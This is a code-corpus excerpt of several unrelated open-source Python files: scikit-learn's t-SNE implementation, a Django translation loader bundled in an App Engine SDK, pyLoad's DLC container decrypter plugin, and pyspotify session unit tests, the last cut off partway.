desired_perplexity : float
Desired perplexity of the joint probability distributions.
verbose : int
Verbosity level.
Returns
-------
P : array, shape (n_samples * (n_samples-1) / 2,)
Condensed joint probability matrix.
"""
# Compute conditional probabilities such that they approximately match
# the desired perplexity
conditional_P = _utils._binary_search_perplexity(
distances, desired_perplexity, verbose)
P = conditional_P + conditional_P.T
sum_P = np.maximum(np.sum(P), MACHINE_EPSILON)
P = np.maximum(squareform(P) / sum_P, MACHINE_EPSILON)
return P
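# In math terms (mirroring the code above): given conditional probabilities
# p_{j|i} from the perplexity search, the returned condensed matrix holds
#     p_ij = (p_{j|i} + p_{i|j}) / sum_{k != l} (p_{l|k} + p_{k|l})
# so that the joint distribution sums to one.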
def _kl_divergence(params, P, alpha, n_samples, n_components):
"""t-SNE objective function: KL divergence of p_ijs and q_ijs.
Parameters
----------
params : array, shape (n_params,)
Unraveled embedding.
P : array, shape (n_samples * (n_samples-1) / 2,)
Condensed joint probability matrix.
alpha : float
Degrees of freedom of the Student's-t distribution.
n_samples : int
Number of samples.
n_components : int
Dimension of the embedded space.
Returns
-------
kl_divergence : float
Kullback-Leibler divergence of p_ij and q_ij.
grad : array, shape (n_params,)
Unraveled gradient of the Kullback-Leibler divergence with respect to
the embedding.
"""
X_embedded = params.reshape(n_samples, n_components)
# Q is a heavy-tailed distribution: Student's t-distribution
n = pdist(X_embedded, "sqeuclidean")
n += 1.
n /= alpha
n **= (alpha + 1.0) / -2.0
Q = np.maximum(n / (2.0 * np.sum(n)), MACHINE_EPSILON)
# Optimization trick below: np.dot(x, y) is faster than
# np.sum(x * y) because it calls BLAS
# Objective: C (Kullback-Leibler divergence of P and Q)
kl_divergence = 2.0 * np.dot(P, np.log(P / Q))
# Gradient: dC/dY
grad = np.ndarray((n_samples, n_components))
PQd = squareform((P - Q) * n)
for i in range(n_samples):
np.dot(_ravel(PQd[i]), X_embedded[i] - X_embedded, out=grad[i])
grad = grad.ravel()
c = 2.0 * (alpha + 1.0) / alpha
grad *= c
return kl_divergence, grad
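# For reference, the Student's t similarities used in _kl_divergence are
#     q_ij = (1 + ||y_i - y_j||^2 / alpha)^(-(alpha + 1) / 2) / Z
# with Z normalizing over all pairs; the factor 2.0 in the Q computation
# accounts for each pair appearing only once in the condensed matrix.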
def _gradient_descent(objective, p0, it, n_iter, n_iter_without_progress=30,
momentum=0.5, learning_rate=1000.0, min_gain=0.01,
min_grad_norm=1e-7, min_error_diff=1e-7, verbose=0,
args=None):
"""Batch gradient descent with momentum and individual gains.
Parameters
----------
objective : function or callable
Should return a tuple of cost and gradient for a given parameter
vector.
p0 : array-like, shape (n_params,)
Initial parameter vector.
it : int
Current number of iterations (this function will be called more than
once during the optimization).
n_iter : int
Maximum number of gradient descent iterations.
n_iter_without_progress : int, optional (default: 30)
Maximum number of iterations without progress before we abort the
optimization.
momentum : float, within (0.0, 1.0), optional (default: 0.5)
The momentum generates a weight for previous gradients that decays
exponentially.
learning_rate : float, optional (default: 1000.0)
The learning rate should be extremely high for t-SNE! Values in the
range [100.0, 1000.0] are common.
min_gain : float, optional (default: 0.01)
Minimum individual gain for each parameter.
min_grad_norm : float, optional (default: 1e-7)
If the gradient norm is below this threshold, the optimization will
be aborted.
min_error_diff : float, optional (default: 1e-7)
If the absolute difference of two successive cost function values
is below this threshold, the optimization will be aborted.
verbose : int, optional (default: 0)
Verbosity level.
args : sequence
Arguments to pass to objective function.
Returns
-------
p : array, shape (n_params,)
Optimum parameters.
error : float
Optimum.
i : int
Last iteration.
"""
if args is None:
args = []
p = p0.copy().ravel()
update = np.zeros_like(p)
gains = np.ones_like(p)
error = np.finfo(np.float).max
best_error = np.finfo(np.float).max
best_iter = 0
for i in range(it, n_iter):
new_error, grad = objective(p, *args)
error_diff = np.abs(new_error - error)
error = new_error
grad_norm = linalg.norm(grad)
if error < best_error:
best_error = error
best_iter = i
elif i - best_iter > n_iter_without_progress:
if verbose >= 2:
print("[t-SNE] Iteration %d: did not make any progress "
"during the last %d episodes. Finished."
% (i + 1, n_iter_without_progress))
break
if min_grad_norm >= grad_norm:
if verbose >= 2:
print("[t-SNE] Iteration %d: gradient norm %f. Finished."
% (i + 1, grad_norm))
break
if min_error_diff >= error_diff:
if verbose >= 2:
print("[t-SNE] Iteration %d: error difference %f. Finished."
% (i + 1, error_diff))
break
# Increase the gain where the gradient direction flipped relative to the
# running update, and dampen it where it stayed the same.
inc = update * grad < 0.0
dec = np.invert(inc)
gains[inc] += 0.05
gains[dec] *= 0.95
np.clip(gains, min_gain, np.inf, out=gains)
grad *= gains
update = momentum * update - learning_rate * grad
p += update
if verbose >= 2 and (i + 1) % 10 == 0:
print("[t-SNE] Iteration %d: error = %.7f, gradient norm = %.7f"
% (i + 1, error, grad_norm))
return p, error, i
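# A minimal, illustrative use of the optimizer above (not part of the public
# API; the toy objective and the values here are assumptions for demonstration):
#
#     def toy_objective(p):
#         return np.sum(p ** 2), 2.0 * p  # cost and gradient of a quadratic
#
#     p, error, i = _gradient_descent(toy_objective, np.array([1.0, -1.0]),
#                                     it=0, n_iter=100, learning_rate=0.1)
#     # p is now close to the optimum at the origin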
def trustworthiness(X, X_embedded, n_neighbors=5, precomputed=False):
"""Expresses to what extent the local structure is retained.
The trustworthiness is within [0, 1]. It is defined as
.. math::
T(k) = 1 - \frac{2}{nk (2n - 3k - 1)} \sum^n_{i=1}
\sum_{j \in U^{(k)}_i} (r(i, j) - k)
where :math:`r(i, j)` is the rank of the embedded datapoint j
according to the pairwise distances between the embedded datapoints,
:math:`U^{(k)}_i` is the set of points that are in the k nearest
neighbors in the embedded space but not in the original space.
* "Neighborhood Preservation in Nonlinear Projection Methods: An
Experimental Study"
J. Venna, S. Kaski
* "Learning a Parametric Embedding by Preserving Local Structure"
L.J.P. van der Maaten
Parameters
----------
X : array, shape (n_samples, n_features) or (n_samples, n_samples)
If the metric is 'precomputed' X must be a square distance
matrix. Otherwise it contains a sample per row.
X_embedded : array, shape (n_samples, n_components)
Embedding of the training data in low-dimensional space.
n_neighbors : int, optional (default: 5)
Number of neighbors k that will be considered.
precomputed : bool, optional (default: False)
Set this flag if X is a precomputed square distance matrix.
Returns
-------
trustworthiness : float
Trustworthiness of the low-dimensional embedding.
"""
if precomputed:
dist_X = X
else:
dist_X = pairwise_distances(X, squared=True)
dist_X_embedded = pairwise_distances(X_embedded, squared=True)
ind_X = np.argsort(dist_X, axis=1)
ind_X_embedded = np.argsort(dist_X_embedded, axis=1)[:, 1:n_neighbors + 1]
n_samples = X.shape[0]
t = 0.0
ranks = np.zeros(n_neighbors)
for i in range(n_samples):
for j in range(n_neighbors):
ranks[j] = np.where(ind_X[i] == ind_X_embedded[i, j])[0][0]
ranks -= n_neighbors
t += np.sum(ranks[ranks > 0])
t = 1.0 - t * (2.0 / (n_samples * n_neighbors *
(2.0 * n_samples - 3.0 * n_neighbors - 1.0)))
return t
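# Sanity check (illustrative): embedding the data onto itself preserves every
# neighborhood, so the score is exactly 1.0:
#
#     >>> X = np.random.RandomState(0).randn(20, 5)
#     >>> trustworthiness(X, X)
#     1.0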
class TSNE(BaseEstimator):
"""t-distributed Stochastic Neighbor Embedding.
t-SNE [1] is a tool to visualize high-dimensional data. It converts
similarities between data points to joint probabilities and tries
to minimize the Kullback-Leibler divergence between the joint
probabilities of the low-dimensional embedding and the
high-dimensional data. t-SNE has a cost function that is not convex,
i.e. with different initializations we can get different results.
It is highly recommended to use another dimensionality reduction
method (e.g. PCA for dense data or TruncatedSVD for sparse data)
to reduce the number of dimensions to a reasonable amount (e.g. 50)
if the number of features is very high. This will suppress some
noise and speed up the computation of pairwise distances between
samples. For more tips see Laurens van der Maaten's FAQ [2].
Read more in the :ref:`User Guide <t_sne>`.
Parameters
----------
n_components : int, optional (default: 2)
Dimension of the embedded space.
perplexity : float, optional (default: 30)
The perplexity is related to the number of nearest neighbors that
is used in other manifold learning algorithms. Larger datasets
usually require a larger perplexity. Consider selecting a value
between 5 and 50. The choice is not extremely critical since t-SNE
is quite insensitive to this parameter.
early_exaggeration : float, optional (default: 4.0)
Controls how tight natural clusters in the original space are in
the embedded space and how much space will be between them. For
larger values, the space between natural clusters will be larger
in the embedded space. Again, the choice of this parameter is not
very critical. If the cost function increases during initial
optimization, the early exaggeration factor or the learning rate
might be too high.
learning_rate : float, optional (default: 1000)
The learning rate can be a critical parameter. It should be
between 100 and 1000. If the cost function increases during initial
optimization, the early exaggeration factor or the learning rate
might be too high. If the cost function gets stuck in a bad local
minimum increasing the learning rate helps sometimes.
n_iter : int, optional (default: 1000)
Maximum number of iterations for the optimization. Should be at
least 200.
metric : string or callable, optional
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by scipy.spatial.distance.pdist for its metric parameter, or
a metric listed in pairwise.PAIRWISE_DISTANCE_FUNCTIONS.
If metric is "precomputed", X is assumed to be a distance matrix.
Alternatively, if metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
should take two arrays from X as input and return a value indicating
the distance between them. The default is "euclidean" which is
interpreted as squared euclidean distance.
init : string, optional (default: "random")
Initialization of embedding. Possible options are 'random' and 'pca'.
PCA initialization cannot be used with precomputed distances and is
usually more globally stable than random initialization.
verbose : int, optional (default: 0)
Verbosity level.
random_state : int or RandomState instance or None (default)
Pseudo Random Number generator seed control. If None, use the
numpy.random singleton. Note that different initializations
might result in different local minima of the cost function.
Attributes
----------
embedding_ : array-like, shape (n_samples, n_components)
Stores the embedding vectors.
training_data_ : array-like, shape (n_samples, n_features)
Stores the training data.
Examples
--------
>>> import numpy as np
>>> from sklearn.manifold import TSNE
>>> X = np.array([[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 1]])
>>> model = TSNE(n_components=2, random_state=0)
>>> model.fit_transform(X) # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
array([[ 887.28..., 238.61...],
[ -714.79..., 3243.34...],
[ 957.30..., -2505.78...],
[-1130.28..., -974.78...]])
References
----------
[1] van der Maaten, L.J.P.; Hinton, G.E. Visualizing High-Dimensional Data
Using t-SNE. Journal of Machine Learning Research 9:2579-2605, 2008.
[2] van der Maaten, L.J.P. t-Distributed Stochastic Neighbor Embedding
http://homepage.tudelft.nl/19j49/t-SNE.html
"""
def __init__(self, n_components=2, perplexity=30.0,
early_exaggeration=4.0, learning_rate=1000.0, n_iter=1000,
metric="euclidean", init="random", verbose=0,
random_state=None):
if init not in ["pca", "random"]:
raise ValueError("'init' must be either 'pca' or 'random'")
self.n_components = n_components
self.perplexity = perplexity
self.early_exaggeration = early_exaggeration
self.learning_rate = learning_rate
self.n_iter = n_iter
self.metric = metric
self.init = init
self.verbose = verbose
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model using X as training data.
Parameters
----------
X : array, shape (n_samples, n_features) or (n_samples, n_samples)
If the metric is 'precomputed' X must be a square distance
matrix. Otherwise it contains a sample per row.
"""
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'], dtype=np.float64)
random_state = check_random_state(self.random_state)
if self.early_exaggeration < 1.0:
raise ValueError("early_exaggeration must be at least 1, but is "
"%f" % self.early_exaggeration)
if self.n_iter < 200:
raise ValueError("n_iter should be at least 200")
if self.metric == "precomputed":
if self.init == 'pca':
raise ValueError("The parameter init=\"pca\" cannot be used "
"with metric=\"precomputed\".")
if X.shape[0] != X.shape[1]:
raise ValueError("X should be a square distance matrix")
distances = X
else:
if self.verbose:
print("[t-SNE] Computing pairwise distances...")
if self.metric == "euclidean":
distances = pairwise_distances(X, metric=self.metric, squared=True)
else:
distances = pairwise_distances(X, metric=self.metric)
# Degrees of freedom of the Student's t-distribution. The suggestion
# alpha = n_components - 1 comes from "Learning a Parametric Embedding
# by Preserving Local Structure" Laurens van der Maaten, 2009.
alpha = max(self.n_components - 1.0, 1)
n_samples = X.shape[0]
self.training_data_ = X
P = _joint_probabilities(distances, self.perplexity, self.verbose)
if self.init == 'pca':
pca = RandomizedPCA(n_components=self.n_components,
random_state=random_state)
X_embedded = pca.fit_transform(X)
elif self.init == 'random':
X_embedded = None
else:
raise ValueError("Unsupported initialization scheme: %s"
% self.init)
self.embedding_ = self._tsne(P, alpha, n_samples, random_state,
X_embedded=X_embedded)
return self
def _tsne(self, P, alpha, n_samples, random_state, X_embedded=None):
"""Runs t-SNE."""
# t-SNE minimizes the Kullback-Leibler divergence of the Gaussians P
# and the Student's t-distributions Q. The optimization algorithm that
# we use is batch gradient descent with three stages:
# * early exaggeration with momentum 0.5
# * early exaggeration with momentum 0.8
# * final optimization with momentum 0.8
# The embedding is initialized with iid samples from Gaussians with
# standard deviation 1e-4.
if X_embedded is None:
# Initialize embedding randomly
X_embedded = 1e-4 * random_state.randn(n_samples,
self.n_components)
params = X_embedded.ravel()
# Early exaggeration
P *= self.early_exaggeration
params, error, it = _gradient_descent(
_kl_divergence, params, it=0, n_iter=50, momentum=0.5,
min_grad_norm=0.0, min_error_diff=0.0,
learning_rate=self.learning_rate, verbose=self.verbose,
args=[P, alpha, n_samples, self.n_components])
params, error, it = _gradient_descent(
_kl_divergence, params, it=it + 1, n_iter=100, momentum=0.8,
min_grad_norm=0.0, min_error_diff=0.0,
learning_rate=self.learning_rate, verbose=self.verbose,
args=[P, alpha, n_samples, self.n_components])
if self.verbose:
print("[t-SNE] Error after %d iterations with early "
"exaggeration: %f" % (it + 1, error))
# Final optimization
P /= self.early_exaggeration
params, error, it = _gradient_descent(
_kl_divergence, params, it=it + 1, n_iter=self.n_iter,
momentum=0.8, learning_rate=self.learning_rate,
verbose=self.verbose, args=[P, alpha, n_samples,
self.n_components])
if self.verbose:
print("[t-SNE] Error after %d iterations: %f" % (it + 1, error))
X_embedded = params.reshape(n_samples, self.n_components)
return X_embedded
def fit_transform(self, X, y=None):
"""Transform X to the embedded space.
Parameters
----------
X : array, shape (n_samples, n_features) or (n_samples, n_samples)
If the metric is 'precomputed' X must be a square distance
matrix. Otherwise it contains a sample per row.
Returns
-------
X_new : array, shape (n_samples, n_components)
Embedding of the training data in low-dimensional space.
"""
self.fit(X)
return self.embedding_
|
dvliman/jaikuengine
|
refs/heads/master
|
.google_appengine/google/appengine/_internal/django/utils/translation/__init__.py
|
23
|
"""
Internationalization support.
"""
from google.appengine._internal.django.utils.encoding import force_unicode
from google.appengine._internal.django.utils.functional import lazy, curry
__all__ = ['gettext', 'gettext_noop', 'gettext_lazy', 'ngettext',
'ngettext_lazy', 'string_concat', 'activate', 'deactivate',
'get_language', 'get_language_bidi', 'get_date_formats',
'get_partial_date_formats', 'check_for_language', 'to_locale',
'get_language_from_request', 'templatize', 'ugettext', 'ugettext_lazy',
'ungettext', 'deactivate_all']
# Here be dragons, so a short explanation of the logic won't hurt:
# We are trying to solve two problems: (1) access settings, in particular
# settings.USE_I18N, as late as possible, so that modules can be imported
# without having to first configure Django, and (2) if some other code creates
# a reference to one of these functions, don't break that reference when we
# replace the functions with their real counterparts (once we do access the
# settings).
def delayed_loader(real_name, *args, **kwargs):
"""
Call the real, underlying function. We have a level of indirection here so
that modules can use the translation bits without actually requiring
Django's settings bits to be configured before import.
"""
from google.appengine._internal.django.conf import settings
if settings.USE_I18N:
from google.appengine._internal.django.utils.translation import trans_real as trans
else:
from google.appengine._internal.django.utils.translation import trans_null as trans
# Make the originally requested function call on the way out the door.
return getattr(trans, real_name)(*args, **kwargs)
g = globals()
for name in __all__:
g['real_%s' % name] = curry(delayed_loader, name)
del g, delayed_loader
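# Illustrative consequence of the indirection above: the wrappers below can
# be imported before Django settings are configured, and whether trans_real
# or trans_null backs them is decided only on the first actual call.
#
#     from google.appengine._internal.django.utils.translation import ugettext
#     ugettext('Hello')  # settings.USE_I18N is consulted here, not at import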
def gettext_noop(message):
return real_gettext_noop(message)
ugettext_noop = gettext_noop
def gettext(message):
return real_gettext(message)
def ngettext(singular, plural, number):
return real_ngettext(singular, plural, number)
def ugettext(message):
return real_ugettext(message)
def ungettext(singular, plural, number):
return real_ungettext(singular, plural, number)
ngettext_lazy = lazy(ngettext, str)
gettext_lazy = lazy(gettext, str)
ungettext_lazy = lazy(ungettext, unicode)
ugettext_lazy = lazy(ugettext, unicode)
def activate(language):
return real_activate(language)
def deactivate():
return real_deactivate()
def get_language():
return real_get_language()
def get_language_bidi():
return real_get_language_bidi()
def get_date_formats():
return real_get_date_formats()
def get_partial_date_formats():
return real_get_partial_date_formats()
def check_for_language(lang_code):
return real_check_for_language(lang_code)
def to_locale(language):
return real_to_locale(language)
def get_language_from_request(request):
return real_get_language_from_request(request)
def templatize(src):
return real_templatize(src)
def deactivate_all():
return real_deactivate_all()
def _string_concat(*strings):
"""
Lazy variant of string concatenation, needed for translations that are
constructed from multiple parts.
"""
return u''.join([force_unicode(s) for s in strings])
string_concat = lazy(_string_concat, unicode)
|
GammaC0de/pyload
|
refs/heads/master
|
src/pyload/plugins/containers/DLC.py
|
1
|
# -*- coding: utf-8 -*-
import base64
import os
import re
import xml.dom.minidom
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from pyload.core.utils.old import decode
from ..base.container import BaseContainer
class DLC(BaseContainer):
__name__ = "DLC"
__type__ = "container"
__version__ = "0.32"
__status__ = "testing"
__pyload_version__ = "0.5"
__pattern__ = r"(.+\.dlc|[\w\+^_]+==[\w\+^_/]+==)$"
__config__ = [
("enabled", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
(
"folder_per_package",
"Default;Yes;No",
"Create folder for each package",
"Default",
),
]
__description__ = """DLC container decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [
("RaNaN", "RaNaN@pyload.net"),
("spoob", "spoob@pyload.net"),
("mkaay", "mkaay@mkaay.de"),
("Schnusch", "Schnusch@users.noreply.github.com"),
("Walter Purcaro", "vuolter@gmail.com"),
("GammaC0de", "nitzo2001[AT]yahoo[DOT]com"),
]
KEY = "cb99b5cbc24db398"
IV = "9bc24cb995cb8db3"
API_URL = "http://service.jdownloader.org/dlcrypt/service.php?srcType=dlc&destType=pylo&data={}"
def decrypt(self, pyfile):
fs_filename = os.fsdecode(pyfile.url)
with open(fs_filename) as dlc:
data = dlc.read().strip()
data += "=" * (-len(data) % 4)
dlc_key = data[-88:]
dlc_data = base64.b64decode(data[:-88])
dlc_content = self.load(self.API_URL.format(dlc_key))
try:
rc = base64.b64decode(
re.search(r"<rc>(.+)</rc>", dlc_content, re.S).group(1)
)[:16]
except AttributeError:
self.fail(self._("Container is corrupted"))
cipher = Cipher(
algorithms.AES(self.KEY), modes.CBC(self.IV), backend=default_backend()
)
decryptor = cipher.decryptor()
key = decryptor.update(rc) + decryptor.finalize()
# The decrypted 16 byte key doubles as the IV when decrypting the body,
# per the standard DLC container scheme.
body_cipher = Cipher(
algorithms.AES(key), modes.CBC(key), backend=default_backend()
)
body_decryptor = body_cipher.decryptor()
self.data = base64.b64decode(
body_decryptor.update(dlc_data) + body_decryptor.finalize()
)
self.packages = [
(name or pyfile.name, links, name or pyfile.name)
for name, links in self.get_packages()
]
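# Container layout handled above (illustrative summary): the trailing 88
# characters of a .dlc file are the base64 key blob sent to the jdownloader
# service; everything before it is base64 encoded AES-CBC ciphertext whose
# plaintext is, in turn, base64 encoded XML parsed by the methods below.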
def get_packages(self):
root = xml.dom.minidom.parseString(self.data).documentElement
content = root.getElementsByTagName("content")[0]
return self.parse_packages(content)
def parse_packages(self, start_node):
return [
(
base64.b64decode(decode(node.getAttribute("name"))),
self.parse_links(node),
)
for node in start_node.getElementsByTagName("package")
]
def parse_links(self, start_node):
return [
base64.b64decode(node.getElementsByTagName("url")[0].firstChild.data)
for node in start_node.getElementsByTagName("file")
]
|
jodal/pyspotify
|
refs/heads/v2.x/develop
|
tests/test_session.py
|
3
|
# encoding: utf-8
from __future__ import unicode_literals
import unittest
import spotify
from spotify.session import _SessionCallbacks
import tests
from tests import mock
@mock.patch('spotify.session.lib', spec=spotify.lib)
class SessionTest(unittest.TestCase):
def tearDown(self):
spotify._session_instance = None
def test_raises_error_if_a_session_already_exists(self, lib_mock):
tests.create_real_session(lib_mock)
with self.assertRaises(RuntimeError):
tests.create_real_session(lib_mock)
@mock.patch('spotify.Config')
def test_creates_config_if_none_provided(self, config_cls_mock, lib_mock):
lib_mock.sp_session_create.return_value = spotify.ErrorType.OK
session = spotify.Session()
config_cls_mock.assert_called_once_with()
self.assertEqual(session.config, config_cls_mock.return_value)
@mock.patch('spotify.Config')
def test_tries_to_load_application_key_if_none_provided(
self, config_cls_mock, lib_mock):
lib_mock.sp_session_create.return_value = spotify.ErrorType.OK
config_mock = config_cls_mock.return_value
config_mock.application_key = None
spotify.Session()
config_mock.load_application_key_file.assert_called_once_with()
def test_raises_error_if_not_ok(self, lib_mock):
lib_mock.sp_session_create.return_value = (
spotify.ErrorType.BAD_API_VERSION)
config = spotify.Config()
config.application_key = b'\x01' * 321
with self.assertRaises(spotify.Error):
spotify.Session(config=config)
def test_releases_sp_session_when_session_dies(self, lib_mock):
sp_session = spotify.ffi.NULL
def func(sp_session_config, sp_session_ptr):
sp_session_ptr[0] = sp_session
return spotify.ErrorType.OK
lib_mock.sp_session_create.side_effect = func
config = spotify.Config()
config.application_key = b'\x01' * 321
session = spotify.Session(config=config)
session = None # noqa
spotify._session_instance = None
tests.gc_collect()
lib_mock.sp_session_release.assert_called_with(sp_session)
def test_login_raises_error_if_no_password_and_no_blob(self, lib_mock):
lib_mock.sp_session_login.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
with self.assertRaises(AttributeError):
session.login('alice')
def test_login_with_password(self, lib_mock):
lib_mock.sp_session_login.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.login('alice', 'secret')
lib_mock.sp_session_login.assert_called_once_with(
session._sp_session, mock.ANY, mock.ANY,
False, spotify.ffi.NULL)
self.assertEqual(
spotify.ffi.string(lib_mock.sp_session_login.call_args[0][1]),
b'alice')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_session_login.call_args[0][2]),
b'secret')
def test_login_with_blob(self, lib_mock):
lib_mock.sp_session_login.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.login('alice', blob='secret blob')
lib_mock.sp_session_login.assert_called_once_with(
session._sp_session, mock.ANY, spotify.ffi.NULL,
False, mock.ANY)
self.assertEqual(
spotify.ffi.string(lib_mock.sp_session_login.call_args[0][1]),
b'alice')
self.assertEqual(
spotify.ffi.string(lib_mock.sp_session_login.call_args[0][4]),
b'secret blob')
def test_login_with_remember_me_flag(self, lib_mock):
lib_mock.sp_session_login.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.login('alice', 'secret', remember_me='anything truish')
lib_mock.sp_session_login.assert_called_once_with(
session._sp_session, mock.ANY, mock.ANY,
True, spotify.ffi.NULL)
def test_login_fail_raises_error(self, lib_mock):
lib_mock.sp_session_login.return_value = spotify.ErrorType.NO_SUCH_USER
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.login('alice', 'secret')
def test_logout(self, lib_mock):
lib_mock.sp_session_logout.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.logout()
lib_mock.sp_session_logout.assert_called_once_with(session._sp_session)
def test_logout_fail_raises_error(self, lib_mock):
lib_mock.sp_session_login.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.logout()
def test_remembered_user_name_grows_buffer_to_fit_username(self, lib_mock):
username = 'alice' * 100
lib_mock.sp_session_remembered_user.side_effect = (
tests.buffer_writer(username))
session = tests.create_real_session(lib_mock)
result = session.remembered_user_name
lib_mock.sp_session_remembered_user.assert_called_with(
session._sp_session, mock.ANY, mock.ANY)
self.assertEqual(result, username)
def test_remembered_user_name_is_none_if_not_remembered(self, lib_mock):
lib_mock.sp_session_remembered_user.return_value = -1
session = tests.create_real_session(lib_mock)
result = session.remembered_user_name
lib_mock.sp_session_remembered_user.assert_called_with(
session._sp_session, mock.ANY, mock.ANY)
self.assertIsNone(result)
def test_relogin(self, lib_mock):
lib_mock.sp_session_relogin.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.relogin()
lib_mock.sp_session_relogin.assert_called_once_with(
session._sp_session)
def test_relogin_fail_raises_error(self, lib_mock):
lib_mock.sp_session_relogin.return_value = (
spotify.ErrorType.NO_CREDENTIALS)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.relogin()
def test_forget_me(self, lib_mock):
lib_mock.sp_session_forget_me.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.forget_me()
lib_mock.sp_session_forget_me.assert_called_with(session._sp_session)
def test_forget_me_fail_raises_error(self, lib_mock):
lib_mock.sp_session_forget_me.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.forget_me()
@mock.patch('spotify.user.lib', spec=spotify.lib)
def test_user(self, user_lib_mock, lib_mock):
lib_mock.sp_session_user.return_value = (
spotify.ffi.cast('sp_user *', 42))
session = tests.create_real_session(lib_mock)
result = session.user
lib_mock.sp_session_user.assert_called_with(session._sp_session)
self.assertIsInstance(result, spotify.User)
def test_user_if_not_logged_in(self, lib_mock):
lib_mock.sp_session_user.return_value = spotify.ffi.NULL
session = tests.create_real_session(lib_mock)
result = session.user
lib_mock.sp_session_user.assert_called_with(session._sp_session)
self.assertIsNone(result)
def test_user_name(self, lib_mock):
lib_mock.sp_session_user_name.return_value = spotify.ffi.new(
'char[]', b'alice')
session = tests.create_real_session(lib_mock)
result = session.user_name
lib_mock.sp_session_user_name.assert_called_with(session._sp_session)
self.assertEqual(result, 'alice')
def test_user_country(self, lib_mock):
lib_mock.sp_session_user_country.return_value = (
ord('S') << 8 | ord('E'))
session = tests.create_real_session(lib_mock)
result = session.user_country
lib_mock.sp_session_user_country.assert_called_with(
session._sp_session)
self.assertEqual(result, 'SE')
@mock.patch('spotify.playlist_container.lib', spec=spotify.lib)
def test_playlist_container(self, playlist_lib_mock, lib_mock):
lib_mock.sp_session_playlistcontainer.return_value = (
spotify.ffi.cast('sp_playlistcontainer *', 42))
session = tests.create_real_session(lib_mock)
result = session.playlist_container
lib_mock.sp_session_playlistcontainer.assert_called_with(
session._sp_session)
self.assertIsInstance(result, spotify.PlaylistContainer)
@mock.patch('spotify.playlist_container.lib', spec=spotify.lib)
def test_playlist_container_if_already_listened_to(
self, playlist_lib_mock, lib_mock):
lib_mock.sp_session_playlistcontainer.return_value = (
spotify.ffi.cast('sp_playlistcontainer *', 42))
session = tests.create_real_session(lib_mock)
result1 = session.playlist_container
result1.on(
spotify.PlaylistContainerEvent.PLAYLIST_ADDED, lambda *args: None)
result2 = session.playlist_container
result1.off()
self.assertIsInstance(result1, spotify.PlaylistContainer)
self.assertIs(result1, result2)
def test_playlist_container_if_not_logged_in(self, lib_mock):
lib_mock.sp_session_playlistcontainer.return_value = spotify.ffi.NULL
session = tests.create_real_session(lib_mock)
result = session.playlist_container
lib_mock.sp_session_playlistcontainer.assert_called_with(
session._sp_session)
self.assertIsNone(result)
@mock.patch('spotify.playlist.lib', spec=spotify.lib)
def test_inbox(self, playlist_lib_mock, lib_mock):
lib_mock.sp_session_inbox_create.return_value = (
spotify.ffi.cast('sp_playlist *', 42))
session = tests.create_real_session(lib_mock)
result = session.inbox
lib_mock.sp_session_inbox_create.assert_called_with(
session._sp_session)
self.assertIsInstance(result, spotify.Playlist)
# Since we *created* the sp_playlist, we already have a refcount of 1
# and shouldn't increase the refcount when wrapping this sp_playlist in
# a Playlist object
self.assertEqual(playlist_lib_mock.sp_playlist_add_ref.call_count, 0)
def test_inbox_if_not_logged_in(self, lib_mock):
lib_mock.sp_session_inbox_create.return_value = spotify.ffi.NULL
session = tests.create_real_session(lib_mock)
result = session.inbox
lib_mock.sp_session_inbox_create.assert_called_with(
session._sp_session)
self.assertIsNone(result)
def test_set_cache_size(self, lib_mock):
lib_mock.sp_session_set_cache_size.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.set_cache_size(100)
lib_mock.sp_session_set_cache_size.assert_called_once_with(
session._sp_session, 100)
def test_set_cache_size_fail_raises_error(self, lib_mock):
lib_mock.sp_session_set_cache_size.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.set_cache_size(100)
def test_flush_caches(self, lib_mock):
lib_mock.sp_session_flush_caches.return_value = spotify.ErrorType.OK
session = tests.create_real_session(lib_mock)
session.flush_caches()
lib_mock.sp_session_flush_caches.assert_called_once_with(
session._sp_session)
def test_flush_caches_fail_raises_error(self, lib_mock):
lib_mock.sp_session_flush_caches.return_value = (
spotify.ErrorType.BAD_API_VERSION)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.flush_caches()
def test_preferred_bitrate(self, lib_mock):
lib_mock.sp_session_preferred_bitrate.return_value = (
spotify.ErrorType.OK)
session = tests.create_real_session(lib_mock)
session.preferred_bitrate(spotify.Bitrate.BITRATE_320k)
lib_mock.sp_session_preferred_bitrate.assert_called_with(
session._sp_session, spotify.Bitrate.BITRATE_320k)
def test_preferred_bitrate_fail_raises_error(self, lib_mock):
lib_mock.sp_session_preferred_bitrate.return_value = (
spotify.ErrorType.INVALID_ARGUMENT)
session = tests.create_real_session(lib_mock)
with self.assertRaises(spotify.Error):
session.preferred_bitrate(17)
def test_preferred_offline_bitrate(self, lib_mock):
lib_mock.sp_session_preferred_offline_bitrate.return_value = (
spotify.ErrorType.OK)
session = tests.create_real_session(lib_mock)
session.preferred_offline_bitrate(spotify.Bitrate.BITRATE_320k)
lib_mock.sp_session_preferred_offline_bitrate.assert_called_with(
